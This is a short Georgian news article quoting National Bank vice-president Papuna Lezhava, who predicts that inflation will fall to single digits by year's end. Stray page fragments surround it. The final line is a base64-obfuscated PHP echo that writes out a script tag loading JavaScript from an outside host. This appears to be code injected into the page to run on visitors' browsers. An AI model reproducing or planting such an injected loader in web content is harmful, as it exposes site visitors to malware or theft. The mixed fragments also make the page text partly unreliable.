celsiusi
ავერსი შნაიდერი
ეროვნული ბანკის ვიცე-პრეზიდენტის, პაპუნა ლეჟავას განცხადებით, წლის ბოლოსთვის ინფლაცია ერთნიშნა მაჩვენებელზე ჩამოვა.
 
მისივე თქმით, მიუხედავად იმისა, რომ გეოპოლიტიკური მდგომარეობა დაძაბულია, მიმდინარე თვიდან ინფლაცია კლებას დაიწყებს.
 
„გეოპოლიტიკურ მოვლენებს რეგიონში ბუნებრივია, აქვს გავლენა საქართველოზეც, ჩვენს ეკონომიკაზე და საბანკო სექტორზე. გარდა ამისა, ახალი გამოსულია ჩვენი ეკონომიკა და საბანკო სექტორი კოვიდის კრიზისიდან, რამაც ჯამურად დიდი დარტყმა მიაყენა ეკონომიკას. კონკრეტულ დეტალებში არ შევალ, თუმცა ეს გეოპოლიტიკური გავლენა იქნება ფინანსურ და ეკონომიკურ სექტორზე უფრო მცირე, ვიდრე პანდემიის დროს. რაც შეეხება ინფლაციას, წლის ბოლოსთვის ვფიქრობთ, რომ ჩამოვა ერთნიშნა ნიშნულზე.
 
მარტის ინფლაციაც უკვე შემცირებული იქნება წინა პერიოდებთან შედარებით. თუმცა ჯამურად შეიძლება, ითქვას, რომ წლის განმავლობაში ინფლაცია მაღალ ნიშნულზე შენარჩუნდება. ამის მიუხედავად შემცირება ეტაპობრივად უკვე დაიწყება“,განაცხადა პაპუნა ლეჟავამ.
864
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");